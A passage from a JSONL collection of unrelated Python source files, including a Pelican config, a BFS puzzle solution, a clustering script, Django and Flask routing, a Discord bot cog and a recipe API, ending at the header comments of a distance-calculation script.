'http://python.org/'),\n ('Cloud Foundry', 'http://cloudfoundry.com/'),\n ('Pelican', 'http://blog.getpelican.com/'),\n ('CloudFlare', 'http://cloudflare.com/'),)\n\n# Social widget\nSOCIAL = (('LinkedIn', 'http://www.linkedin.com/in/mattclark04'),\n ('Twitter', 'https://twitter.com/mattclarkdotnet'),\n ('FaceBook', 'http://www.facebook.com/profile.php?id=616541694'),)\n\nTWITTER_USERNAME = 'mattclarkdotnet'\nGITHUB_URL = 'https://github.com/mattclarkdotnet'\n\nDEFAULT_PAGINATION = False\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"371951292","text":"from collections import deque\n\ndx, dy = [-1, 1, 0, 0],[0, 0, -1, 1]\n\ndef isNotWall(x, y):\n return (0 <= x < R) and (0 <= y < C)\n\nR, C = map(int,input().split())\nforest = list(input() for _ in range(R))\nwater = [[-1]*C for _ in range(R)]\nvisited = [[-1]*C for _ in range(R)]\nq = deque()\n\n# Store the starting positions\nfor x in range(R):\n for y in range(C):\n if forest[x][y] == '*':\n # water first\n q.append((x, y))\n water[x][y] = 0\n # the hedgehog's start\n elif forest[x][y] == 'S':\n Sx, Sy = x, y\n # the beaver's den\n elif forest[x][y] == 'D':\n Ex, Ey = x, y\n\n# Track how the water spreads\nwhile q:\n x, y = q.popleft()\n for n in range(4):\n if isNotWall(x+dx[n], y+dy[n]):\n # if it is neither the den nor a rock\n if forest[x+dx[n]][y+dy[n]] not in 'DX':\n # if the water has not reached it yet\n if water[x+dx[n]][y+dy[n]] == -1:\n water[x+dx[n]][y+dy[n]] = water[x][y] + 1\n q.append((x+dx[n], y+dy[n]))\n\nq.append((Sx, Sy))\nvisited[Sx][Sy] = 0\n\n# Track the hedgehog's movement\nwhile q:\n x, y = q.popleft()\n for n in 
range(4):\n if isNotWall(x+dx[n], y+dy[n]):\n # if it is neither water nor a rock\n if forest[x+dx[n]][y+dy[n]] not in '*X':\n # if the hedgehog has not visited it yet\n if visited[x+dx[n]][y+dy[n]] == -1:\n # if water never reaches the cell, or only after the hedgehog would arrive\n if water[x+dx[n]][y+dy[n]] == -1 or visited[x][y] + 1 < water[x+dx[n]][y+dy[n]]:\n visited[x+dx[n]][y+dy[n]] = visited[x][y] + 1\n q.append((x+dx[n], y+dy[n]))\n \n# Did the hedgehog reach the den?\nif visited[Ex][Ey] == -1:\n print('KAKTUS')\nelse:\n print(visited[Ex][Ey])\n\n'''\nArgh, time limit exceeded on the first attempt...\nRetrying with BFS => no more time comparisons needed, only a visited check\n=> maybe full BFS was not even necessary..?\n- Water first\n1. Put the initial '*' cells into the queue\n2. While the queue holds values, pop one and check the four directions (while)\n2-1. Check the indices (isNotWall)\n2-2. Check for 'X' and 'D'\n2-3. Check whether water has already filled the cell (water)\n3. Append every neighbour that satisfies the conditions to the queue\n4. Store the current value + 1\nuntil the queue is empty\n- Next, the hedgehog\n1. same, but starting from 'S'\n2. same\n2-2. same, but against 'X' and '*'\n2-3. same (visited)\n2-4. also require that the water arrives later than the hedgehog moves in\n3. same\n4. same\nIf visited[Ex][Ey] was reached, print its value; otherwise print KAKTUS\n'''","sub_path":"boj_study/3055_boj.py","file_name":"3055_boj.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"615919919","text":"import pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly.plotly as py \nimport plotly.graph_objs as go\n\nfrom itertools import cycle\n\nfrom sklearn import preprocessing\nfrom sklearn import cluster\nfrom sklearn import mixture\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\n\nfrom sklearn.cluster import (MeanShift, MiniBatchKMeans, SpectralClustering, AgglomerativeClustering)\n\n# =====================================================================\n# 1. Download a dataset (using pandas)\n# =====================================================================\n\n# url = \"https://s3.amazonaws.com/happiness-report/2019/Chapter2OnlineData.xls\"\n# df = pd.read_excel(url)\n\ndf = pd.read_excel(r\"C:\\Users\\acikgozs\\Documents\\Chapter2OnlineData.xls\")\n\n\n# =====================================================================\n# 2. Visualize raw data\n# =====================================================================\n\n# ===== Correlation graph =====\ncor = df.corr()\nsns.heatmap(cor,square = True)\n#cor.to_csv(r\"C:\\Users\\acikgozs\\Documents\\test.csv\")\n\n# ===== Plotly World Map =====\ndata = [go.Choropleth(\n locations = df[\"Country name\"], \n locationmode = \"country names\", \n z = df[\"Life Ladder\"], \n text = df[\"Country name\"],\n colorbar = go.choropleth.ColorBar(title = \"Happiness Index\")\n)]\n\nlayout = go.Layout(\n title = go.layout.Title(text = \"Happiness Index 2018\"), \n geo = go.layout.Geo(showframe = False, projection = go.layout.geo.Projection(type = \"equirectangular\"))\n)\n\nchoromap3 = go.Figure(data = data, layout = layout)\npy.iplot(choromap3)\n\n\n# =====================================================================\n# 3. Process data\n# =====================================================================\n\ndf_trans = df.groupby(\"Country name\").transform(lambda x: x.fillna(x.mean()))\ndf_trans.dropna(inplace = True)\n\n\n# =====================================================================\n# 3.a. Dimension reduction\n# =====================================================================\n\nreducer_p = PCA(n_components = 2)\npca_df = reducer_p.fit_transform(df_trans)\n\n# reducer_t = TSNE(n_components = 2)\n# tsne_df = reducer_t.fit_transform(pca_df)\n\n\n# =====================================================================\n# 3.b. 
Manual Dimension selection\n# =====================================================================\n\nsubdf = df_trans[[\"Life Ladder\", \"Log GDP per capita\", \"Social support\", \"Healthy life expectancy at birth\", \"Freedom to make life choices\", \"Generosity\", \"Perceptions of corruption\", \"Confidence in national government\"]]\n# Reassign instead of filling in place to avoid chained-assignment warnings on a column slice.\nsubdf = subdf.fillna(0)\n\nscaler = preprocessing.StandardScaler()\n\nscaled_df = scaler.fit_transform(subdf)\n\nreducer_p = PCA(n_components = 2)\npca_df = reducer_p.fit_transform(scaled_df)\n\n\n# =====================================================================\n# 4. Clustering\n# =====================================================================\n\nlearner = MeanShift(bandwidth = None)\nms = learner.fit_predict(pca_df)\n\nlearner = MiniBatchKMeans(n_clusters = 3)\nmbkm = learner.fit_predict(pca_df)\n\nlearner = SpectralClustering(n_clusters = 3)\nsc = learner.fit_predict(pca_df)\n\nlearner = AgglomerativeClustering(n_clusters = 3)\nac = learner.fit_predict(pca_df)\n\n\n# =====================================================================\n# 5. Cluster graphs\n# =====================================================================\n\n# Meanshift Results\nfig = plt.figure(figsize=(16, 8))\nfig.canvas.set_window_title(\"Clustering data from WHI\")\n\nplt.scatter(pca_df[:, 0], pca_df[:, 1], c = ms.astype(float))","sub_path":"Clustering/world_happiness_index.py","file_name":"world_happiness_index.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"360697139","text":"\"\"\"safi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nimport rest_framework_jwt.views\nimport safi.settings\nimport django.views.static\n\nurlpatterns = [\r\n url(r'^accounts/', include('accounts.urls', namespace='accounts')),\r\n url(r'^endoso/', include('endoso.urls', namespace='endoso')),\r\n url(r'^custodia/', include('custodia.urls', namespace='custodia')),\r\n url(r'^causa/', include('causa.urls', namespace='causa')),\r\n url(r'^admin/', admin.site.urls),\r\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\r\n url(r'^api-token-auth/', rest_framework_jwt.views.obtain_jwt_token),\r\n url(r'^api-token-verify/', rest_framework_jwt.views.verify_jwt_token),\r\n url(r'^api-token-refresh/', rest_framework_jwt.views.refresh_jwt_token),\r\n url(r'^media/(?P<path>.*)$', django.views.static.serve,{'document_root': safi.settings.MEDIA_ROOT, 'show_indexes': False}),\r\n]\r\n\r\n#url(r'^causa/', include('causa.urls', namespace='causa')),\r\n","sub_path":"safi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"366344783","text":"\"\"\"MacPorts URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import url\nfrom ports import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('statistics/submit/', views.stats_submit, name='stats_submit'),\n path('statistics/ports/', views.stats_port_installations, name='stats_port_installations'),\n path('statistics/ports/filter/', views.stats_port_installations_filter, name='stats_port_installations_filter'),\n path('statistics/faq/', views.stats_faq, name='stats_faq'),\n path('statistics/', views.stats, name='stats_home'),\n url(r'^maintainer/github/(?P<github_handle>[-a-zA-Z0-9_.]+)/$', views.maintainer_detail_github, name='maintainer_detail_github'),\n url(r'^maintainer/email/(?P<name>[-a-zA-Z0-9_.]+)__(?P<domain>[-a-zA-Z0-9_.]+)/$', views.maintainer_detail_email, name='maintainer_detail_email'),\n path('port/', include('ports.urls'), name='port-index'),\n path('ports/', views.index, name='ports-index'),\n path('ports/search/', views.search, name='ports_search'),\n path('ports/filter/maintainer/', views.search_ports_in_maintainer, name='search_ports_in_maintainer'),\n path('ports/filter/category/', views.search_ports_in_category, name='search_ports_in_category'),\n path('ports/filter/variant/', views.search_ports_in_variant, name='search_ports_in_variant'),\n path('ports/load_tickets/', views.tickets, name='trac_tickets'),\n path('ports/category/<slug:cat>/', views.categorylist, name='category_list'),\n url(r'^ports/variant/(?P<variant>[a-zA-Z0-9_.]+)/$', views.variantlist, name='variant_list'),\n path('ports/all_builds/filter/', views.all_builds_filter, name='all_builds_filter'),\n path('ports/all_builds/', views.all_builds_view, name='all_builds'),\n path('api/v1/', include('api_v1.urls')),\n path('about/', views.about_page, name='about_page'),\n]\n","sub_path":"app/MacPorts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"282402287","text":"from flask import Flask\nimport sys\nsys.path.append(\"..\")\n# from flask_cors import CORS\nfrom flask import request\n# from flask_ngrok import run_with_ngrok\nfrom src.Modules.prediction import prediction\nfrom src.Modules.recommender import recommendation\nimport logging\n\n\n# CORS(app)\n# run_with_ngrok(app)\napp = Flask(__name__)\n\n\n@app.route('/ml/recommend', methods=['GET'])\n# Main function for recommendation\ndef recommend():\n user_id = request.args.get('userid')\n recommend_model = recommendation(user_id)\n try:\n return recommend_model.recommend_with_existing_model()\n except Exception as err:\n logging.exception(err)\n\n\n@app.route('/ml/predict', methods=['GET'])\ndef predict():\n userid = request.args.get('userid')\n predict_model = prediction(userid)\n try:\n return predict_model.predict()\n except Exception as err:\n logging.exception(err)\n\n@app.route('/')\ndef welcome():\n text=\"Welcome to SmartList API\"\n return text\n\nif __name__ == '__main__':\n 
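# NOTE: debug=True enables Flask's auto-reloader and interactive debugger; turn it off in production.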
app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"261215259","text":"import math\nimport re\nfrom basic_domain import basic_domain\nclass space_domain(basic_domain):\n\tdef __init__(self):\n\t\tself._domain_type = 'SPACE'\n\n\tdef get_cardinality(self, value_component_len):\n\t\tif value_component_len < 0:\n\t\t\treturn 0\n\t\tif value_component_len == 0:\n\t\t\treturn 1\n\t\treturn math.pow(5, value_component_len)\n\n\n\tdef get_match_result(self, value):\n\t\treg = r'^(\\s+).*$'\n\t\tcompile_reg = re.compile(reg)\n\t\tmatch_result = compile_reg.match(value)\n\t\treturn match_result\n\n\tdef match_domain_success(self, value):\n\t\tmatch_result = self.get_match_result(value)\n\t\treturn match_result is not None\n\n\tdef get_value_component(self, value):\n\t\tmatch_result = self.get_match_result(value)\n\t\tif match_result is not None:\n\t\t\tmatch_string = match_result.group(1)\n\t\telse:\n\t\t\tmatch_string = ''\n\t\treturn match_string\n\t\t\n\tdef get_remain_string(self, value):\n\t\tmatch_string = self.get_value_component(value)\n\t\tmatch_string_len = len(match_string)\n\t\tif match_string_len == len(value):\n\t\t\tremain_string = ''\n\t\telif match_string_len < len(value):\n\t\t\tremain_string = value[match_string_len:]\n\t\treturn remain_string\n\n\tdef get_domain_type(self):\n\t\treturn self._domain_type","sub_path":"server/space_domain.py","file_name":"space_domain.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536968963","text":"import discord, functools\nfrom io import BytesIO\nfrom discord.ext import commands\nfrom cogs.rpgtools import makebg\n\ndef is_patron():\n\tdef predicate(ctx):\n\t\tmember = ctx.bot.get_guild(430017996304678923).get_member(ctx.author.id) # cross server stuff\n\t\tif not member:\n\t\t\treturn False\n\t\treturn discord.utils.get(member.roles, name='Donator') is not None or discord.utils.get(member.roles, name='Administrators') is not None\n\treturn commands.check(predicate)\n\nclass Patreon:\n\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\n\t@is_patron()\n\t@commands.command(description=\"[Patreon Only] Changes a weapon name.\")\n\tasync def weaponname(self, ctx, itemid: int, *, newname: str):\n\t\tif len(newname)>20:\n\t\t\tawait ctx.send(\"Name too long.\")\n\t\t\treturn\n\t\tasync with self.bot.pool.acquire() as conn:\n\t\t\tasync with conn.cursor() as cur:\n\t\t\t\tawait cur.execute('SELECT * FROM allitems WHERE \"owner\"=%s and \"id\"=%s;', (ctx.author.id, itemid))\n\t\t\t\titem = await cur.fetchone()\n\t\t\t\tif not item:\n\t\t\t\t\tawait ctx.send(f\"You don't own an item with the ID `{itemid}`.\")\n\t\t\t\t\treturn\n\t\t\t\tawait cur.execute('UPDATE allitems SET \"name\"=%s WHERE \"id\"=%s;', (newname, itemid))\n\t\t\t\tawait ctx.send(f\"The item with the ID `{itemid}` is now called `{newname}`.\")\n\n\t@is_patron()\n\t@commands.command(description=\"[Patreon Only] Changes your profile background.\")\n\tasync def background(self, ctx, url: str=None):\n\t\tpremade = [f\"{self.bot.BASE_URL}/profile/premade1.png\", f\"{self.bot.BASE_URL}/profile/premade2.png\", f\"{self.bot.BASE_URL}/profile/premade3.png\", f\"{self.bot.BASE_URL}/profile/premade4.png\"]\n\t\tif not url:\n\t\t\treturn await ctx.send(f\"Please specify either a premade 
background (`1` to `{len(premade)}`), a custom URL or use `reset` to use the standard image.\")\n\t\telif url == \"reset\":\n\t\t\turl = 0\n\t\telif url.startswith(\"http\") and (url.endswith(\".png\") or url.endswith(\".jpg\") or url.endswith(\".jpeg\")):\n\t\t\turl = url\n\t\telse:\n\t\t\ttry:\n\t\t\t\tif int(url) in range(1, len(premade)+1):\n\t\t\t\t\turl = premade[int(url)-1]\n\t\t\t\telse:\n\t\t\t\t\treturn await ctx.send(\"That is not a valid premade background.\")\n\t\t\texcept:\n\t\t\t\treturn await ctx.send(\"I couldn't read that URL. Does it start with `http://` or `https://` and is either a png or jpeg?\")\n\t\tasync with self.bot.pool.acquire() as conn:\n\t\t\tasync with conn.cursor() as cur:\n\t\t\t\ttry:\n\t\t\t\t\tawait cur.execute('UPDATE profile SET \"background\"=%s WHERE \"user\"=%s;', (url, ctx.author.id,))\n\t\t\t\texcept:\n\t\t\t\t\treturn await ctx.send(\"The URL is too long.\")\n\t\t\t\tif url != 0:\n\t\t\t\t\tawait ctx.send(f\"Your new profile picture is now:\\n{url}\")\n\t\t\t\telse:\n\t\t\t\t\tawait ctx.send(\"Your profile picture has been reset.\")\n\n\t@is_patron()\n\t@commands.command(description=\"[Patreon Only] Generates a background image.\")\n\tasync def makebackground(self, ctx, url: str, overlaytype: int):\n\t\tif overlaytype not in [1,2]:\n\t\t\treturn await ctx.send(\"Use either `1` or `2` as the overlay type.\")\n\t\tif not (url.startswith(\"http\") and (url.endswith(\".png\") or url.endswith(\".jpg\") or url.endswith(\".jpeg\"))):\n\t\t\treturn await ctx.send(\"I couldn't read that URL. Does it start with `http://` or `https://` and is either a png or jpeg?\")\n\t\t# Download the source image; this must run after the URL check rather than behind its return.\n\t\tasync with self.bot.session.get(url) as r:\n\t\t\tbackground = BytesIO(await r.read())\n\t\t\tbackground.seek(0)\n\t\tthing = functools.partial(makebg, background, overlaytype)\n\t\toutput_buffer = await self.bot.loop.run_in_executor(None, thing)\n\t\tawait ctx.send(file=discord.File(fp=output_buffer, filename=\"GeneratedProfile.png\"))\n\n\ndef setup(bot):\n\tbot.add_cog(Patreon(bot))\n","sub_path":"cogs/patreon.py","file_name":"patreon.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"42918266","text":"# You are a professional robber planning to rob houses along a street. 
Each\n# house has a certain amount of money stashed, the only constraint stopping you\n# from robbing each of them is that adjacent houses have security system\n# connected and it will automatically contact the police if two adjacent houses\n# were broken into on the same night.\n\n# Given a list of non-negative integers representing the amount of money of each\n# house, determine the maximum amount of money you can rob tonight without\n# alerting the police.\n\nclass Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n if n == 0:\n return 0\n elif n == 1:\n return nums[0]\n max_including = [0] * (n + 1)\n max_including[1] = nums[0]\n max_including[2] = nums[1]\n max_so_far = max(max_including[1], max_including[2])\n for i in xrange(3, n + 1):\n max_including[i] = max(max_including[i - 3],\n max_including[i - 2]) + nums[i - 1]\n max_so_far = max(max_including[i], max_so_far)\n return max_so_far\n","sub_path":"HouseRobber.py","file_name":"HouseRobber.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"262763720","text":"import random\nimport time\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom model import Model\n\n\nEMBEDDING_SIZE = 200\nDENSE_DIM = 12 # Previously was 256\nNUM_FILTERS = 100\nNUM_EPOCHS = 3\nNUM_ITERATIONS = 4\nGROUP_SIZE = 1_600_000\nSAMPLES_PER_GROUP = GROUP_SIZE // 160\nTRAIN_SIZE = SAMPLES_PER_GROUP * 10\n\n\ndef get_sentences(df):\n sentences = []\n for index, row in tqdm(df.iterrows()):\n words = row.text.split()\n target = row.target\n sentences.append((words, target))\n return sentences\n\n\ndef merge_sentences(s1, s2):\n s = []\n for i in range(min(len(s1), len(s2))):\n s.append(s1[i])\n s.append(s2[i])\n return s\n\n\nif __name__ == \"__main__\":\n negative_tweets_path = \"../data/clean_train_negative.csv\"\n positive_tweets_path = \"../data/clean_train_positive.csv\"\n df_negative = pd.read_csv(negative_tweets_path, index_col=0)\n df_positive = pd.read_csv(positive_tweets_path, index_col=0)\n\n print(\"preparing input sentences\")\n all_negative = get_sentences(df_negative)\n all_positive = get_sentences(df_positive)\n all_sentences = merge_sentences(all_negative, all_positive)\n\n # Split into train and test sets\n all_train_sentences = all_sentences[:TRAIN_SIZE]\n print(\"Size of training data:\", len(all_train_sentences))\n test_sentences = all_sentences[-2 * SAMPLES_PER_GROUP:]\n print(\"Size of testing data:\", len(test_sentences))\n\n # Define a model and start learning\n model = Model(\"CNN\", EMBEDDING_SIZE, NUM_FILTERS, [2, 3, 4], DENSE_DIM)\n labeled = random.sample([i for i in range(TRAIN_SIZE)], SAMPLES_PER_GROUP)\n labeled = set(labeled)\n\n start_time = time.time()\n for iteration in range(NUM_ITERATIONS):\n train_sentences = [all_train_sentences[i] for i in labeled]\n print(\"Training with {:4.2f}% of data\".format(100 * len(train_sentences) / len(all_train_sentences)))\n model.reset()\n model.train(train_sentences, test_sentences, NUM_EPOCHS)\n if iteration != NUM_ITERATIONS - 1:\n labeled = model.choose_unlabeled_data_by_clusters_stub(all_train_sentences, labeled, SAMPLES_PER_GROUP)\n # labeled = model.choose_unlabeled_data_random(all_train_sentences, labeled, SAMPLES_PER_GROUP)\n\n print(\"total time:\", time.time() - 
start_time)\n","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583862914","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 3 22:57:29 2017\n\n@author: hsadeghi\n\"\"\"\n#\nresults = {}\nresults['index'] = 1\nresults['training_error'] = 2\nresults['test_error'] = 3\n\n\nresults['input_dim'] = 4\nresults['learning_rate'] = 5\n\nsave_name = \"/vol/grid-solar/sgeusers/hsadeghi/config_{}_{}.txt\".format(2, 3)\nfile_1 = open(save_name, \"w\")\n\n# write each setting as \"key value\", one per line\nfor key, value in results.items():\n\n    file_1.write(key + ' ' + str(value) + '\\n')\n\nfile_1.close()\n","sub_path":"May/past_codes/test_file_write.py","file_name":"test_file_write.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52036737","text":"from flask_restful import Resource, reqparse\nfrom models.recipe import RecipeModel, RecipeSpendAssos\nfrom models.drug import DrugModel, RecipeDrugAssos\nfrom models.patient import UserPatientRecipeAssos\nimport json\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom db import db\nimport math\n\n\nclass Recipe(Resource):\n    parser = reqparse.RequestParser()\n    parser.add_argument(\n        \"title\", type=str, required=True, help=\"this field is required\"\n    )\n    parser.add_argument(\n        \"end_date\", type=str, required=True, help=\"this field is required\"\n    )\n    parser.add_argument(\n        \"notes\", type=str, required=True, help=\"this field is required\"\n    )\n    # parser.add_argument(\n    #     \"dept_id\", type=int, required=True, help=\"this field is required\"\n    # )\n    parser.add_argument(\n        \"patient_id\", type=int, required=True, help=\"this field is required\"\n    )\n    parser.add_argument(\n        \"drugs\",\n        action='append',\n    )\n\n    @classmethod\n    @jwt_required\n    def post(cls):\n        data = cls.parser.parse_args()\n        drugs = []\n        for item in data.drugs:\n            x = item.replace(\"'\", '\"')\n            var = json.loads(x)\n            drug_id = var['drug_id']\n            drug = RecipeDrugAssos(drug_id=drug_id, dose=var['dose'], unit=var['unit'], duration=var['duration'],\n                                   rotes=var['rotes'])\n            drugs.append(drug)\n\n        recipe = RecipeModel(title=data.title, end_date=data.end_date, notes=data.notes,\n                             drugs=drugs)\n\n        recipe.save_to_db()\n        current_user_id = get_jwt_identity()\n        recipe = recipe.id\n        patient = data.patient_id\n        user_patient_recipe = UserPatientRecipeAssos(user_id=current_user_id, patient_id=patient, recipe_id=recipe)\n        user_patient_recipe.save_to_db()\n\n        return {\"message\": \"Recipe created successfully\"}\n\n\nclass SearchRecipeById(Resource):\n    @classmethod\n    def get(cls, id):\n        recipe = RecipeModel.find_by_id(_id=id)\n        if not recipe:\n            return {\"message\": \"No recipe found\"}, 400\n        return recipe.json(), 200\n\n\nclass RecipeSpend(Resource):\n    parser = reqparse.RequestParser()\n    parser.add_argument(\n        \"recipe_id\", type=int, required=True, help=\"this field is required\"\n    )\n    parser.add_argument(\n        \"drugs\",\n        action='append',\n    )\n\n    @classmethod\n    @jwt_required\n    def post(cls):\n        data = cls.parser.parse_args()\n        details = []\n        for item in data.drugs:\n            x = item.replace(\"'\", '\"')\n            var = json.loads(x)\n            drug_id = var['drug_id']\n            drug = DrugModel.find_by_id(drug_id)\n\n            discount = (var['dose'] * var['duration'] * var['unit']) / (drug.unit)\n            information = {\n                \"drug_name\": drug.name,\n                
\"quantity\": math.ceil(discount)\n }\n details.append(information)\n db.session.commit()\n\n if (drug.quantity - discount) > 0:\n current_user_id = get_jwt_identity()\n spend_recipe = RecipeSpendAssos(user_id=current_user_id, recipe_id=data.recipe_id)\n db.session.add(spend_recipe)\n db.session.commit()\n drug.quantity = (drug.quantity - math.ceil((discount)))\n db.session.commit()\n\n\n else:\n stockDrugs = []\n stockDrugs.append(drug)\n return {\n \"message\": \"Not enough quantity of this drug\",\n \"data\": [],\n \"drug\": [drug.json() for drug in stockDrugs]\n\n }, 404\n return {\"message\": \"Recipe Spend successful\",\n \"data\": details\n }\n","sub_path":"resources/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"653792659","text":"\nfrom django.conf.urls import url\nfrom .views import cart_home, cart_update, checkout_home, checkout_done_view, payment_done\n\nurlpatterns = [\n\n url(r'^$',cart_home,name='home'),\n url(r'^checkout/$', checkout_home, name='checkout'),\n url(r'^process/$', checkout_done_view, name='process'), \n url(r'^success/$', payment_done, name='success'), \n url(r'^update/$', cart_update, name='update'),\n]\n\n","sub_path":"src code/src/carts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"428171925","text":"# -*- coding: utf-8 -*-\n# distance_for_each_data_point.py\n################################################################\n################################################################\n#Python script to calculate the distance between data point and\n#the epicenter.\n#The distance is calculated with Hubeny formula.\n#===============================================================\n#Explanation of each object:\n#---------------------------------------------------------------\n#t1 :an object which contains starting time.\n#R1 :an object which contains the long radius of the\n# Earth.\n#R2 :an object which contains the short radius of the\n# Earth.\n#e1 :an object which contains the eccentricity of the\n# Earth.\n#pickupUSGSdata :a data frame object which contains the input\n# earthquake and orbit number data.\n#num1 :an object which contains the number of the orbit.\n#long1 :an object which contains the longitude of the\n# earthquake.\n#lat1 :an object which contains the latitude of the\n# earthquake.\n#occur_time :an object which contains the time when the\n# earthquake occurred.\n#filename :an object which contains the name of the file\n# where orbit data is preserved.\n#df1 :a data frame object which contains the input\n# orbit data.\n#list_dis :a list object which will contain the distance\n# for each orbit.\n#ido1 :an object which contains the latitude of the\n# epicenters with the radian notation\n#keido1 :an object which contains the longitude of the\n# epicenters with the radian notation\n#ido2 :an object which contains the latitude of the\n# orbits with the radian notation\n#keido2 :an object which contains the longitude of the\n# orbits with the radian notation\n#dif_ido :an object which contains the difference between\n# latitude of the epicenter and the latitude of\n# the orbit.\n#dif_keido :an object which contains the difference between\n# the longitude of the epicenter and the longitude\n# of the orbit.\n#myu_y :an object which contains the average of the\n# latitude of the epicenter 
and the latitude\n# of the orbit.\n#W1, M1, N1 :objects which are necessary to calculate\n# the distance.\n#dist :an object which contains the distance between\n# the epicenter and the orbit.\n#output_name :an object which contains the name of the output\n# file.\n#t2 :an object which contains finishing time.\n#elapsed_time :an object which contains elapsed time.\n#***************************************************************\n#Structure of this \"distance_for_each_data_point.py\" script:\n#---------------------------------------------------------------\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and math modules.\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\n#\n#[3. Setting parameters.]\n#3-1. Setting the long radius of the Earth.\n#3-2. Setting the short radius of the Earth.\n#3-3. Calculating the eccentricity of the Earth.\n#\n#\n#[4. Importing earthquake and orbit data.]\n#4-1. Importing earthquake and orbit data from a csv file.\n#4-2. Resetting the index number.\n#\n#\n#[5. Calculating the distance for each data point.]\n#5-1. Extracting the orbit number.\n#5-2. Extracting the longitude.\n#5-3. Extracting the latitude.\n#5-4. Extracting the time when the earthquake occurred.\n#5-5. Setting the file name using the orbit number and the\n# time extracted above.\n#5-6. Importing a file for the orbit data.\n#5-7. Making a list object which will contain the distance\n# for each data point in the orbit.\n#5-8. Starting the calculation for all data points in the\n# orbit data.\n#5-9. Converting the latitude of the epicenters into the\n# radian notation.\n#5-10. Converting the longitude of the epicenters into the\n# radian notation.\n#5-11. Converting the latitude of the orbit into the radian\n# notation.\n#5-12. Converting the longitude of the orbit into the radian\n# notation.\n#5-13. Calculating the difference between the latitude of\n# the epicenter and the latitude of the orbit.\n#5-14. Calculating the difference between the longitude of\n# the epicenter and the longitude of the orbit.\n#5-15. Calculating the average of the latitude of the\n# epicenter and the latitude of the orbit.\n#5-16. Calculating several parameters which are necessary to\n# calculate the distance.\n#5-17. Calculating the distance between the epicenter and the\n# orbit in km using Hubeny formula.\n#5-18. Inserting the data into a list object.\n#\n#\n#[6. Exporting data as a csv format file]\n#6-1. Adding the distance data to the orbit data.\n#6-2. Adding the elapsed time data to the orbit data.\n#6-3. Deleting the list object used to add the distance data\n# to the orbit data.\n#6-4. Setting the file name to export the data.\n#6-5. Exporting the data frame object into a csv file.\n#6-6. Deleting the data frame object used to export the data.\n#\n#\n#[7. measuring execution time]\n#7-1. Measuring finishing time with time module.\n#7-2. Output elapsed time\n#\n################################################################\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and math modules.\n#\nimport pandas as pd\nimport time\nimport math\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\nt1 = time.time()\n#\n#\n#[3. 